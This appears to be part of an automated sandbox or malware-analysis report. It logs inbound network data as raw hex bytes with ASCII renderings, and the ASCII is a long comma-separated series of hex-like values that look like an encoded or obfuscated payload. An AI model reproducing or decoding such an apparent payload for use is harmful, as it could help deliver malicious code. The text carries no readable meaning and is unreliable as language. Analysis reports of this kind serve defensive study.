2023-03-24 14:28:23 UTC	528	IN	Data Raw: 34 2c 37 35 2c 38 32 2c 31 30 31 2c 38 66 2c 65 36 2c 39 33 2c 31 31 39 2c 66 33 2c 31 31 38 2c 33 34 2c 63 35 2c 36 37 2c 35 66 2c 64 64 2c 39 38 2c 31 36 31 2c 31 34 34 2c 33 64 2c 35 66 2c 62 61 2c 39 36 2c 38 63 2c 31 32 36 2c 31 31 38 2c 31 30 30 2c 38 66 2c 65 37 2c 31 33 34 2c 31 31 32 2c 31 32 66 2c 65 36 2c 64 31 2c 31 31 37 2c 64 62 2c 31 32 33 2c 61 36 2c 31 33 38 2c 31 31 63 2c 31 31 66 2c 64 34 2c 65 30 2c 62 61 2c 66 32 2c 38 33 2c 31 32 30 2c 62 39 2c 37 64 2c 66 30 2c 31 31 30 2c 61 65 2c 31 34 65 2c 61 65 2c 62 61 2c 31 36 33 2c 36 65 2c 64 64 2c 36 36 2c 33 33 2c 64 30 2c 62 64 2c 31 34 39 2c 31 32 35 2c 31 30 33 2c 31 34 38 2c 66 38 2c 31 31 62 2c 39 37 2c 36 31 2c 62 37 2c 36 30 2c 66 64 2c 39 32 2c 62 39 2c 61 31 2c 66 62 2c 66 31 2c Data Ascii: 4,75,82,101,8f,e6,93,119,f3,118,34,c5,67,5f,dd,98,161,144,3d,5f,ba,96,8c,126,118,100,8f,e7,134,112,12f,e6,d1,117,db,123,a6,138,11c,11f,d4,e0,ba,f2,83,120,b9,7d,f0,110,ae,14e,ae,ba,163,6e,dd,66,33,d0,bd,149,125,103,148,f8,11b,97,61,b7,60,fd,92,b9,a1,fb,f1,
2023-03-24 14:28:23 UTC	544	IN	Data Raw: 33 32 2c 37 35 2c 31 34 63 2c 63 37 2c 31 33 37 2c 61 30 2c 31 30 65 2c 31 32 30 2c 66 63 2c 31 30 63 2c 31 30 65 2c 36 36 2c 64 36 2c 31 35 34 2c 39 36 2c 31 33 64 2c 31 31 32 2c 66 66 2c 66 38 2c 61 31 2c 38 34 2c 62 30 2c 31 32 36 2c 61 65 2c 34 64 2c 65 65 2c 31 32 30 2c 38 65 2c 61 62 2c 31 33 39 2c 31 32 61 2c 62 32 2c 31 30 32 2c 34 36 2c 61 32 2c 61 37 2c 31 30 34 2c 31 32 35 2c 31 33 39 2c 31 34 64 2c 35 65 2c 65 36 2c 39 31 2c 64 36 2c 38 63 2c 65 34 2c 31 31 30 2c 31 35 64 2c 61 38 2c 31 36 36 2c 31 35 63 2c 31 30 37 2c 35 38 2c 39 35 2c 65 62 2c 65 63 2c 64 65 2c 31 30 30 2c 38 35 2c 31 32 32 2c 66 33 2c 62 62 2c 31 34 30 2c 63 38 2c 31 31 39 2c 34 38 2c 31 31 64 2c 37 63 2c 62 64 2c 66 66 2c 31 33 66 2c 65 64 2c 64 66 2c 62 31 2c 61 64 2c 66 Data Ascii: 32,75,14c,c7,137,a0,10e,120,fc,10c,10e,66,d6,154,96,13d,112,ff,f8,a1,84,b0,126,ae,4d,ee,120,8e,ab,139,12a,b2,102,46,a2,a7,104,125,139,14d,5e,e6,91,d6,8c,e4,110,15d,a8,166,15c,107,58,95,eb,ec,de,100,85,122,f3,bb,140,c8,119,48,11d,7c,bd,ff,13f,ed,df,b1,ad,f
2023-03-24 14:28:23 UTC	560	IN	Data Raw: 2c 62 64 2c 31 31 31 2c 37 35 2c 61 35 2c 66 66 2c 31 32 62 2c 38 35 2c 61 66 2c 31 31 62 2c 31 33 35 2c 39 31 2c 39 62 2c 63 63 2c 37 61 2c 66 66 2c 39 64 2c 31 35 62 2c 61 34 2c 37 33 2c 61 64 2c 64 37 2c 33 63 2c 65 62 2c 65 62 2c 62 66 2c 38 36 2c 31 33 62 2c 36 38 2c 31 35 66 2c 35 30 2c 37 64 2c 63 33 2c 31 32 66 2c 31 34 31 2c 63 65 2c 31 30 65 2c 64 35 2c 65 36 2c 31 33 33 2c 65 64 2c 63 34 2c 36 35 2c 31 32 36 2c 64 32 2c 31 32 61 2c 37 61 2c 62 66 2c 31 36 35 2c 63 38 2c 31 34 62 2c 31 31 35 2c 66 30 2c 63 62 2c 61 63 2c 31 34 63 2c 35 34 2c 31 35 61 2c 39 36 2c 31 31 34 2c 64 61 2c 31 35 35 2c 34 30 2c 37 62 2c 64 37 2c 31 35 33 2c 31 35 33 2c 39 39 2c 61 66 2c 61 61 2c 36 62 2c 65 33 2c 31 31 36 2c 31 33 62 2c 31 34 64 2c 66 33 2c 37 61 2c 31 Data Ascii: ,bd,111,75,a5,ff,12b,85,af,11b,135,91,9b,cc,7a,ff,9d,15b,a4,73,ad,d7,3c,eb,eb,bf,86,13b,68,15f,50,7d,c3,12f,141,ce,10e,d5,e6,133,ed,c4,65,126,d2,12a,7a,bf,165,c8,14b,115,f0,cb,ac,14c,54,15a,96,114,da,155,40,7b,d7,153,153,99,af,aa,6b,e3,116,13b,14d,f3,7a,1
2023-03-24 14:28:23 UTC	576	IN	Data Raw: 2c 31 32 32 2c 65 38 2c 38 37 2c 36 33 2c 63 34 2c 63 30 2c 38 61 2c 34 63 2c 65 64 2c 63 31 2c 31 30 33 2c 66 38 2c 62 61 2c 66 33 2c 61 62 2c 31 33 31 2c 31 30 34 2c 31 31 38 2c 31 31 34 2c 63 37 2c 31 33 36 2c 37 65 2c 38 66 2c 34 30 2c 31 31 62 2c 36 37 2c 38 34 2c 38 64 2c 31 34 30 2c 37 34 2c 31 30 35 2c 65 31 2c 63 61 2c 66 64 2c 39 39 2c 39 34 2c 31 35 64 2c 63 62 2c 65 35 2c 65 36 2c 31 31 37 2c 64 31 2c 64 62 2c 31 32 36 2c 64 36 2c 31 35 36 2c 31 34 66 2c 64 64 2c 31 34 61 2c 31 30 61 2c 64 63 2c 61 36 2c 39 31 2c 36 30 2c 63 63 2c 66 31 2c 39 34 2c 38 62 2c 31 34 66 2c 64 31 2c 31 32 34 2c 37 38 2c 34 36 2c 31 31 38 2c 62 34 2c 64 64 2c 31 31 66 2c 31 31 37 2c 31 35 65 2c 64 31 2c 63 64 2c 36 63 2c 65 64 2c 61 32 2c 36 38 2c 61 37 2c 39 36 2c Data Ascii: ,122,e8,87,63,c4,c0,8a,4c,ed,c1,103,f8,ba,f3,ab,131,104,118,114,c7,136,7e,8f,40,11b,67,84,8d,140,74,105,e1,ca,fd,99,94,15d,cb,e5,e6,117,d1,db,126,d6,156,14f,dd,14a,10a,dc,a6,91,60,cc,f1,94,8b,14f,d1,124,78,46,118,b4,dd,11f,117,15e,d1,cd,6c,ed,a2,68,a7,96,
2023-03-24 14:28:23 UTC	592	IN	Data Raw: 2c 65 35 2c 31 30 33 2c 36 65 2c 31 32 37 2c 31 34 30 2c 38 32 2c 63 36 2c 31 31 66 2c 31 31 38 2c 39 65 2c 31 32 31 2c 61 61 2c 31 34 63 2c 31 32 31 2c 36 62 2c 36 39 2c 31 30 66 2c 38 66 2c 39 30 2c 36 61 2c 31 35 30 2c 37 35 2c 66 65 2c 65 33 2c 34 35 2c 31 31 37 2c 38 32 2c 61 31 2c 31 33 63 2c 38 65 2c 62 66 2c 31 36 61 2c 31 32 36 2c 36 34 2c 37 31 2c 62 64 2c 39 33 2c 31 35 39 2c 35 30 2c 65 38 2c 36 36 2c 31 36 34 2c 61 35 2c 31 34 66 2c 65 35 2c 66 34 2c 36 31 2c 39 32 2c 31 32 66 2c 37 63 2c 62 65 2c 31 34 30 2c 62 62 2c 36 62 2c 31 34 61 2c 38 63 2c 38 36 2c 39 62 2c 61 36 2c 63 33 2c 31 31 35 2c 31 33 32 2c 63 65 2c 31 36 34 2c 33 38 2c 31 30 65 2c 36 35 2c 31 32 35 2c 31 34 62 2c 63 64 2c 38 39 2c 31 31 65 2c 31 30 35 2c 31 30 36 2c 31 36 65 Data Ascii: ,e5,103,6e,127,140,82,c6,11f,118,9e,121,aa,14c,121,6b,69,10f,8f,90,6a,150,75,fe,e3,45,117,82,a1,13c,8e,bf,16a,126,64,71,bd,93,159,50,e8,66,164,a5,14f,e5,f4,61,92,12f,7c,be,140,bb,6b,14a,8c,86,9b,a6,c3,115,132,ce,164,38,10e,65,125,14b,cd,89,11e,105,106,16e
2023-03-24 14:28:23 UTC	608	IN	Data Raw: 2c 63 64 2c 39 37 2c 31 31 61 2c 66 37 2c 39 61 2c 31 31 39 2c 31 33 66 2c 65 66 2c 38 64 2c 31 35 35 2c 65 61 2c 31 31 33 2c 31 30 34 2c 65 32 2c 64 38 2c 65 62 2c 31 33 62 2c 64 37 2c 38 61 2c 61 61 2c 66 37 2c 65 33 2c 36 34 2c 36 33 2c 36 63 2c 66 39 2c 38 36 2c 39 37 2c 33 65 2c 31 34 61 2c 31 32 66 2c 62 39 2c 66 64 2c 62 34 2c 63 34 2c 66 63 2c 66 37 2c 31 32 39 2c 61 63 2c 31 32 65 2c 38 63 2c 31 32 66 2c 62 30 2c 31 33 34 2c 31 31 30 2c 63 36 2c 61 33 2c 64 30 2c 38 39 2c 39 32 2c 31 33 61 2c 31 33 36 2c 31 33 32 2c 34 34 2c 31 33 36 2c 64 35 2c 64 37 2c 61 66 2c 63 34 2c 64 35 2c 36 65 2c 65 32 2c 31 31 36 2c 63 39 2c 31 34 39 2c 31 31 38 2c 31 31 32 2c 31 32 63 2c 64 61 2c 36 63 2c 31 32 37 2c 61 34 2c 65 64 2c 39 33 2c 37 35 2c 31 31 37 2c 31 Data Ascii: ,cd,97,11a,f7,9a,119,13f,ef,8d,155,ea,113,104,e2,d8,eb,13b,d7,8a,aa,f7,e3,64,63,6c,f9,86,97,3e,14a,12f,b9,fd,b4,c4,fc,f7,129,ac,12e,8c,12f,b0,134,110,c6,a3,d0,89,92,13a,136,132,44,136,d5,d7,af,c4,d5,6e,e2,116,c9,149,118,112,12c,da,6c,127,a4,ed,93,75,117,1
2023-03-24 14:28:23 UTC	624	IN	Data Raw: 2c 35 36 2c 63 33 2c 65 37 2c 31 32 39 2c 62 32 2c 61 33 2c 64 31 2c 38 37 2c 39 38 2c 37 38 2c 31 35 61 2c 64 62 2c 31 30 39 2c 38 33 2c 66 32 2c 36 35 2c 64 66 2c 31 32 34 2c 31 31 66 2c 35 39 2c 38 35 2c 31 35 34 2c 61 64 2c 61 38 2c 31 32 38 2c 66 36 2c 36 34 2c 31 33 34 2c 31 36 34 2c 66 61 2c 31 30 38 2c 39 66 2c 61 37 2c 39 38 2c 38 63 2c 66 35 2c 31 31 63 2c 39 61 2c 37 33 2c 37 31 2c 63 30 2c 31 36 39 2c 65 31 2c 62 61 2c 65 34 2c 38 34 2c 38 31 2c 31 34 62 2c 31 34 30 2c 34 38 2c 64 30 2c 33 38 2c 31 30 64 2c 31 33 35 2c 65 30 2c 38 33 2c 31 31 31 2c 65 30 2c 31 31 33 2c 31 30 62 2c 31 30 38 2c 31 33 64 2c 65 62 2c 39 65 2c 61 33 2c 65 63 2c 39 39 2c 61 33 2c 31 31 39 2c 63 36 2c 66 34 2c 31 31 37 2c 65 62 2c 63 61 2c 31 33 34 2c 65 65 2c 38 34 Data Ascii: ,56,c3,e7,129,b2,a3,d1,87,98,78,15a,db,109,83,f2,65,df,124,11f,59,85,154,ad,a8,128,f6,64,134,164,fa,108,9f,a7,98,8c,f5,11c,9a,73,71,c0,169,e1,ba,e4,84,81,14b,140,48,d0,38,10d,135,e0,83,111,e0,113,10b,108,13d,eb,9e,a3,ec,99,a3,119,c6,f4,117,eb,ca,134,ee,84
2023-03-24 14:28:23 UTC	640	IN	Data Raw: 2c 62 66 2c 61 30 2c 31 35 33 2c 31 33 30 2c 31 37 33 2c 61 31 2c 31 32 39 2c 63 63 2c 31 32 31 2c 31 34 36 2c 31 32 30 2c 39 61 2c 62 36 2c 62 65 2c 39 64 2c 37 34 2c 31 35 36 2c 31 34 38 2c 61 63 2c 62 33 2c 31 31 64 2c 31 32 37 2c 39 62 2c 34 65 2c 65 33 2c 31 33 32 2c 61 34 2c 35 38 2c 64 64 2c 36 32 2c 64 62 2c 38 36 2c 35 37 2c 31 30 65 2c 37 39 2c 31 30 37 2c 62 31 2c 64 64 2c 31 33 32 2c 63 34 2c 61 31 2c 39 39 2c 31 32 65 2c 39 64 2c 66 65 2c 36 63 2c 31 31 64 2c 39 39 2c 62 34 2c 31 34 30 2c 39 61 2c 31 31 36 2c 36 31 2c 63 62 2c 31 31 35 2c 35 32 2c 65 33 2c 31 35 39 2c 35 65 2c 61 38 2c 66 62 2c 31 35 30 2c 37 64 2c 31 30 61 2c 64 61 2c 65 31 2c 64 62 2c 31 30 63 2c 31 31 66 2c 62 34 2c 31 33 32 2c 65 35 2c 66 62 2c 63 35 2c 31 31 30 2c 65 35 Data Ascii: ,bf,a0,153,130,173,a1,129,cc,121,146,120,9a,b6,be,9d,74,156,148,ac,b3,11d,127,9b,4e,e3,132,a4,58,dd,62,db,86,57,10e,79,107,b1,dd,132,c4,a1,99,12e,9d,fe,6c,11d,99,b4,140,9a,116,61,cb,115,52,e3,159,5e,a8,fb,150,7d,10a,da,e1,db,10c,11f,b4,132,e5,fb,c5,110,e5
2023-03-24 14:28:23 UTC	656	IN	Data Raw: 2c 61 38 2c 64 32 2c 66 35 2c 61 39 2c 31 31 38 2c 39 64 2c 31 33 36 2c 37 64 2c 65 31 2c 31 31 66 2c 31 31 64 2c 31 32 62 2c 36 38 2c 62 35 2c 31 34 36 2c 37 35 2c 36 38 2c 66 36 2c 31 31 30 2c 62 39 2c 63 38 2c 31 33 34 2c 39 30 2c 37 66 2c 36 64 2c 31 33 31 2c 38 31 2c 64 36 2c 66 33 2c 31 30 62 2c 35 64 2c 31 31 62 2c 66 31 2c 63 32 2c 31 31 37 2c 31 32 31 2c 39 30 2c 39 61 2c 39 38 2c 65 35 2c 62 34 2c 66 34 2c 31 32 65 2c 66 31 2c 31 30 65 2c 31 32 63 2c 66 31 2c 63 33 2c 61 30 2c 64 65 2c 65 35 2c 64 34 2c 31 32 64 2c 31 31 34 2c 66 35 2c 31 35 63 2c 31 31 36 2c 31 30 62 2c 31 34 39 2c 62 38 2c 31 33 66 2c 37 64 2c 35 38 2c 63 31 2c 31 31 37 2c 62 36 2c 31 32 36 2c 31 30 66 2c 37 65 2c 31 31 36 2c 31 31 32 2c 39 63 2c 64 65 2c 62 37 2c 31 31 64 2c Data Ascii: ,a8,d2,f5,a9,118,9d,136,7d,e1,11f,11d,12b,68,b5,146,75,68,f6,110,b9,c8,134,90,7f,6d,131,81,d6,f3,10b,5d,11b,f1,c2,117,121,90,9a,98,e5,b4,f4,12e,f1,10e,12c,f1,c3,a0,de,e5,d4,12d,114,f5,15c,116,10b,149,b8,13f,7d,58,c1,117,b6,126,10f,7e,116,112,9c,de,b7,11d,
2023-03-24 14:28:23 UTC	672	IN	Data Raw: 34 2c 39 30 2c 31 31 63 2c 31 33 34 2c 65 39 2c 31 34 33 2c 31 35 33 2c 61 32 2c 38 35 2c 62 64 2c 39 35 2c 37 64 2c 62 66 2c 64 33 2c 39 31 2c 31 34 62 2c 31 32 62 2c 31 32 63 2c 62 34 2c 31 36 63 2c 39 64 2c 36 30 2c 37 30 2c 63 62 2c 31 33 37 2c 38 32 2c 33 66 2c 31 32 34 2c 31 30 37 2c 31 37 31 2c 31 37 33 2c 38 39 2c 35 62 2c 31 31 39 2c 63 30 2c 66 61 2c 64 62 2c 31 34 31 2c 65 38 2c 61 37 2c 64 37 2c 37 61 2c 31 35 38 2c 31 35 37 2c 37 39 2c 31 34 32 2c 31 32 63 2c 31 35 34 2c 66 37 2c 35 32 2c 62 37 2c 66 36 2c 31 30 39 2c 34 66 2c 66 65 2c 61 34 2c 66 32 2c 31 30 32 2c 31 32 65 2c 39 33 2c 62 35 2c 39 39 2c 31 36 61 2c 66 33 2c 63 31 2c 35 32 2c 37 33 2c 35 66 2c 31 33 32 2c 31 33 34 2c 62 31 2c 38 35 2c 62 30 2c 38 35 2c 62 64 2c 31 31 34 2c 31 Data Ascii: 4,90,11c,134,e9,143,153,a2,85,bd,95,7d,bf,d3,91,14b,12b,12c,b4,16c,9d,60,70,cb,137,82,3f,124,107,171,173,89,5b,119,c0,fa,db,141,e8,a7,d7,7a,158,157,79,142,12c,154,f7,52,b7,f6,109,4f,fe,a4,f2,102,12e,93,b5,99,16a,f3,c1,52,73,5f,132,134,b1,85,b0,85,bd,114,1
2023-03-24 14:28:23 UTC	688	IN	Data Raw: 63 2c 31 32 30 2c 31 30 35 2c 38 32 2c 61 33 2c 35 63 2c 63 34 2c 35 32 2c 33 36 2c 62 64 2c 65 31 2c 31 30 37 2c 65 33 2c 63 39 2c 31 35 64 2c 37 63 2c 65 37 2c 38 32 2c 39 65 2c 35 65 2c 31 32 63 2c 31 36 38 2c 62 66 2c 62 38 2c 64 64 2c 61 64 2c 61 63 2c 66 64 2c 64 65 2c 37 61 2c 61 37 2c 61 32 2c 62 65 2c 31 30 39 2c 31 33 64 2c 31 36 37 2c 62 36 2c 62 64 2c 62 39 2c 38 32 2c 63 31 2c 65 30 2c 64 30 2c 31 34 34 2c 39 66 2c 37 64 2c 64 61 2c 66 31 2c 37 65 2c 66 61 2c 31 30 32 2c 36 32 2c 31 33 32 2c 31 35 31 2c 39 32 2c 61 34 2c 31 30 63 2c 63 62 2c 62 63 2c 39 32 2c 31 30 32 2c 31 35 38 2c 66 31 2c 61 33 2c 38 36 2c 66 37 2c 38 37 2c 65 63 2c 62 38 2c 31 31 39 2c 66 65 2c 31 31 38 2c 31 32 32 2c 65 65 2c 39 65 2c 39 33 2c 66 35 2c 31 33 33 2c 65 66 Data Ascii: c,120,105,82,a3,5c,c4,52,36,bd,e1,107,e3,c9,15d,7c,e7,82,9e,5e,12c,168,bf,b8,dd,ad,ac,fd,de,7a,a7,a2,be,109,13d,167,b6,bd,b9,82,c1,e0,d0,144,9f,7d,da,f1,7e,fa,102,62,132,151,92,a4,10c,cb,bc,92,102,158,f1,a3,86,f7,87,ec,b8,119,fe,118,122,ee,9e,93,f5,133,ef
2023-03-24 14:28:23 UTC	704	IN	Data Raw: 31 32 62 2c 64 30 2c 34 35 2c 39 35 2c 65 30 2c 35 64 2c 35 31 2c 39 63 2c 31 33 32 2c 31 30 32 2c 61 39 2c 38 64 2c 31 30 38 2c 64 62 2c 31 30 31 2c 31 31 34 2c 31 34 34 2c 61 36 2c 38 66 2c 31 32 66 2c 61 35 2c 31 30 61 2c 38 35 2c 61 32 2c 66 62 2c 39 33 2c 36 39 2c 31 31 66 2c 37 66 2c 37 32 2c 31 32 30 2c 63 63 2c 31 30 65 2c 66 39 2c 39 36 2c 31 33 37 2c 39 64 2c 32 65 2c 64 61 2c 61 34 2c 31 36 35 2c 64 38 2c 31 33 37 2c 38 39 2c 37 66 2c 33 63 2c 61 62 2c 37 33 2c 37 64 2c 31 30 65 2c 64 35 2c 62 35 2c 36 66 2c 62 30 2c 62 36 2c 31 32 64 2c 61 65 2c 31 33 31 2c 37 62 2c 66 62 2c 66 34 2c 63 30 2c 63 38 2c 31 32 36 2c 31 32 31 2c 64 65 2c 37 38 2c 31 35 61 2c 64 63 2c 31 30 64 2c 61 61 2c 31 34 37 2c 63 36 2c 61 62 2c 31 30 31 2c 62 62 2c 31 34 34 Data Ascii: 12b,d0,45,95,e0,5d,51,9c,132,102,a9,8d,108,db,101,114,144,a6,8f,12f,a5,10a,85,a2,fb,93,69,11f,7f,72,120,cc,10e,f9,96,137,9d,2e,da,a4,165,d8,137,89,7f,3c,ab,73,7d,10e,d5,b5,6f,b0,b6,12d,ae,131,7b,fb,f4,c0,c8,126,121,de,78,15a,dc,10d,aa,147,c6,ab,101,bb,144
2023-03-24 14:28:23 UTC	720	IN	Data Raw: 2c 31 34 39 2c 65 37 2c 31 30 31 2c 39 36 2c 31 33 61 2c 65 38 2c 61 35 2c 39 63 2c 37 34 2c 62 32 2c 66 35 2c 37 37 2c 31 30 30 2c 31 35 32 2c 39 62 2c 66 38 2c 64 35 2c 39 63 2c 63 30 2c 31 36 31 2c 31 32 32 2c 31 33 38 2c 39 34 2c 65 32 2c 31 30 62 2c 66 35 2c 63 38 2c 31 33 37 2c 62 31 2c 66 33 2c 65 66 2c 31 32 34 2c 31 33 34 2c 62 34 2c 36 63 2c 66 31 2c 31 33 30 2c 31 33 32 2c 39 63 2c 38 37 2c 36 62 2c 38 33 2c 31 32 31 2c 63 37 2c 65 65 2c 35 65 2c 31 34 31 2c 31 34 65 2c 36 39 2c 62 38 2c 64 65 2c 63 33 2c 66 63 2c 31 30 30 2c 38 32 2c 38 30 2c 36 33 2c 65 37 2c 37 31 2c 39 30 2c 35 33 2c 38 65 2c 31 33 30 2c 31 34 63 2c 38 66 2c 61 36 2c 31 32 63 2c 62 65 2c 31 31 35 2c 66 34 2c 37 61 2c 37 65 2c 31 33 66 2c 63 64 2c 39 66 2c 39 32 2c 31 32 36 Data Ascii: ,149,e7,101,96,13a,e8,a5,9c,74,b2,f5,77,100,152,9b,f8,d5,9c,c0,161,122,138,94,e2,10b,f5,c8,137,b1,f3,ef,124,134,b4,6c,f1,130,132,9c,87,6b,83,121,c7,ee,5e,141,14e,69,b8,de,c3,fc,100,82,80,63,e7,71,90,53,8e,130,14c,8f,a6,12c,be,115,f4,7a,7e,13f,cd,9f,92,126
2023-03-24 14:28:23 UTC	736	IN	Data Raw: 2c 66 62 2c 35 35 2c 61 38 2c 66 31 2c 63 38 2c 64 33 2c 33 65 2c 31 31 31 2c 31 33 32 2c 33 37 2c 66 62 2c 37 32 2c 31 35 63 2c 31 32 32 2c 31 30 33 2c 63 66 2c 37 30 2c 34 62 2c 31 30 37 2c 35 38 2c 31 30 36 2c 37 35 2c 66 64 2c 31 30 66 2c 31 32 63 2c 31 30 37 2c 31 33 35 2c 31 31 35 2c 31 31 33 2c 62 34 2c 31 34 32 2c 34 62 2c 31 35 33 2c 36 66 2c 31 33 32 2c 63 33 2c 31 34 65 2c 31 36 33 2c 65 31 2c 31 35 64 2c 31 33 34 2c 38 37 2c 31 34 34 2c 64 63 2c 64 36 2c 31 30 61 2c 35 63 2c 34 31 2c 64 38 2c 31 32 30 2c 63 62 2c 61 62 2c 31 33 62 2c 61 35 2c 66 63 2c 63 34 2c 62 33 2c 63 30 2c 31 30 37 2c 31 36 37 2c 64 63 2c 61 38 2c 31 33 65 2c 31 32 30 2c 37 31 2c 31 33 66 2c 38 35 2c 31 37 35 2c 38 39 2c 31 30 38 2c 66 63 2c 63 37 2c 64 36 2c 35 33 2c 31 Data Ascii: ,fb,55,a8,f1,c8,d3,3e,111,132,37,fb,72,15c,122,103,cf,70,4b,107,58,106,75,fd,10f,12c,107,135,115,113,b4,142,4b,153,6f,132,c3,14e,163,e1,15d,134,87,144,dc,d6,10a,5c,41,d8,120,cb,ab,13b,a5,fc,c4,b3,c0,107,167,dc,a8,13e,120,71,13f,85,175,89,108,fc,c7,d6,53,1
2023-03-24 14:28:23 UTC	752	IN	Data Raw: 32 35 2c 66 37 2c 31 31 35 2c 61 61 2c 31 30 61 2c 34 37 2c 63 33 2c 31 34 30 2c 65 65 2c 66 64 2c 31 31 66 2c 31 30 35 2c 31 32 34 2c 38 63 2c 31 34 39 2c 66 30 2c 31 30 63 2c 38 39 2c 31 31 35 2c 39 64 2c 31 30 39 2c 31 30 32 2c 31 36 62 2c 64 31 2c 31 31 62 2c 38 63 2c 31 36 35 2c 31 33 61 2c 31 30 66 2c 31 33 35 2c 62 31 2c 31 30 32 2c 31 33 64 2c 61 38 2c 66 38 2c 31 30 61 2c 31 33 34 2c 37 35 2c 31 34 31 2c 36 37 2c 31 32 66 2c 31 31 39 2c 35 63 2c 31 32 36 2c 61 34 2c 31 35 62 2c 66 64 2c 65 31 2c 37 65 2c 38 35 2c 31 30 38 2c 37 34 2c 66 32 2c 31 31 64 2c 64 31 2c 38 34 2c 31 36 36 2c 31 30 37 2c 31 34 39 2c 37 35 2c 37 63 2c 62 35 2c 31 32 32 2c 37 35 2c 31 31 34 2c 31 30 36 2c 31 30 32 2c 38 61 2c 63 35 2c 62 63 2c 66 39 2c 31 34 33 2c 31 36 36 Data Ascii: 25,f7,115,aa,10a,47,c3,140,ee,fd,11f,105,124,8c,149,f0,10c,89,115,9d,109,102,16b,d1,11b,8c,165,13a,10f,135,b1,102,13d,a8,f8,10a,134,75,141,67,12f,119,5c,126,a4,15b,fd,e1,7e,85,108,74,f2,11d,d1,84,166,107,149,75,7c,b5,122,75,114,106,102,8a,c5,bc,f9,143,166
2023-03-24 14:28:23 UTC	768	IN	Data Raw: 34 32 2c 38 66 2c 39 30 2c 37 37 2c 37 66 2c 61 36 2c 65 63 2c 31 35 62 2c 64 37 2c 34 63 2c 36 31 2c 31 33 35 2c 66 37 2c 62 36 2c 38 35 2c 31 33 63 2c 31 33 32 2c 65 64 2c 36 33 2c 31 31 39 2c 63 66 2c 31 36 62 2c 31 36 33 2c 31 36 32 2c 31 32 63 2c 62 37 2c 61 39 2c 31 31 34 2c 31 30 66 2c 31 33 31 2c 31 33 36 2c 36 36 2c 31 31 37 2c 65 35 2c 31 30 38 2c 39 33 2c 31 32 38 2c 31 33 62 2c 65 37 2c 31 32 36 2c 39 39 2c 38 66 2c 65 31 2c 65 61 2c 31 35 65 2c 31 34 35 2c 39 61 2c 65 37 2c 31 33 64 2c 36 62 2c 38 64 2c 34 36 2c 31 33 64 2c 62 66 2c 31 32 65 2c 63 38 2c 66 65 2c 63 66 2c 61 31 2c 61 34 2c 63 33 2c 64 62 2c 66 66 2c 66 35 2c 31 31 66 2c 38 33 2c 31 33 36 2c 34 65 2c 37 66 2c 31 30 30 2c 31 35 63 2c 31 35 34 2c 66 36 2c 63 64 2c 63 61 2c 64 63 Data Ascii: 42,8f,90,77,7f,a6,ec,15b,d7,4c,61,135,f7,b6,85,13c,132,ed,63,119,cf,16b,163,162,12c,b7,a9,114,10f,131,136,66,117,e5,108,93,128,13b,e7,126,99,8f,e1,ea,15e,145,9a,e7,13d,6b,8d,46,13d,bf,12e,c8,fe,cf,a1,a4,c3,db,ff,f5,11f,83,136,4e,7f,100,15c,154,f6,cd,ca,dc
2023-03-24 14:28:23 UTC	784	IN	Data Raw: 66 37 2c 31 34 34 2c 31 30 39 2c 31 31 37 2c 34 38 2c 65 64 2c 31 31 62 2c 63 66 2c 65 31 2c 63 38 2c 31 35 65 2c 31 34 33 2c 64 33 2c 39 61 2c 61 65 2c 62 36 2c 31 32 33 2c 31 30 39 2c 66 36 2c 31 30 31 2c 31 30 32 2c 38 37 2c 62 35 2c 38 33 2c 64 62 2c 31 30 62 2c 31 31 31 2c 31 35 38 2c 64 30 2c 39 66 2c 31 34 63 2c 31 31 30 2c 61 65 2c 39 35 2c 36 64 2c 31 30 30 2c 62 33 2c 31 30 62 2c 66 32 2c 37 30 2c 31 30 37 2c 31 37 33 2c 65 38 2c 62 30 2c 38 35 2c 31 33 38 2c 31 31 39 2c 37 30 2c 66 65 2c 66 64 2c 38 65 2c 31 33 30 2c 31 34 36 2c 64 33 2c 64 65 2c 34 32 2c 61 39 2c 35 66 2c 31 32 31 2c 31 33 34 2c 31 33 34 2c 36 64 2c 36 32 2c 39 36 2c 64 61 2c 37 37 2c 37 37 2c 31 31 37 2c 31 30 30 2c 39 36 2c 62 66 2c 62 34 2c 31 33 32 2c 64 37 2c 61 37 2c 31 Data Ascii: f7,144,109,117,48,ed,11b,cf,e1,c8,15e,143,d3,9a,ae,b6,123,109,f6,101,102,87,b5,83,db,10b,111,158,d0,9f,14c,110,ae,95,6d,100,b3,10b,f2,70,107,173,e8,b0,85,138,119,70,fe,fd,8e,130,146,d3,de,42,a9,5f,121,134,134,6d,62,96,da,77,77,117,100,96,bf,b4,132,d7,a7,1
2023-03-24 14:28:23 UTC	800	IN	Data Raw: 32 2c 31 32 64 2c 33 39 2c 31 32 34 2c 65 34 2c 61 31 2c 66 63 2c 36 35 2c 38 34 2c 38 30 2c 31 30 31 2c 64 36 2c 34 64 2c 65 61 2c 31 32 61 2c 66 39 2c 31 35 33 2c 31 32 30 2c 62 33 2c 31 32 34 2c 64 64 2c 31 31 61 2c 35 34 2c 38 30 2c 31 32 39 2c 31 31 64 2c 38 30 2c 61 31 2c 66 36 2c 37 33 2c 31 31 64 2c 37 30 2c 31 31 66 2c 65 65 2c 63 36 2c 31 30 32 2c 35 65 2c 62 65 2c 31 31 64 2c 31 30 32 2c 64 66 2c 38 31 2c 63 61 2c 31 33 63 2c 61 62 2c 38 31 2c 62 39 2c 31 31 61 2c 31 32 31 2c 31 30 39 2c 64 32 2c 38 63 2c 66 38 2c 66 63 2c 31 31 39 2c 64 62 2c 66 66 2c 35 66 2c 61 31 2c 66 38 2c 66 63 2c 38 61 2c 31 33 30 2c 31 32 32 2c 37 33 2c 64 66 2c 62 63 2c 39 31 2c 31 32 34 2c 31 33 62 2c 31 32 62 2c 62 33 2c 61 30 2c 62 34 2c 31 31 61 2c 31 34 34 2c 66 Data Ascii: 2,12d,39,124,e4,a1,fc,65,84,80,101,d6,4d,ea,12a,f9,153,120,b3,124,dd,11a,54,80,129,11d,80,a1,f6,73,11d,70,11f,ee,c6,102,5e,be,11d,102,df,81,ca,13c,ab,81,b9,11a,121,109,d2,8c,f8,fc,119,db,ff,5f,a1,f8,fc,8a,130,122,73,df,bc,91,124,13b,12b,b3,a0,b4,11a,144,f
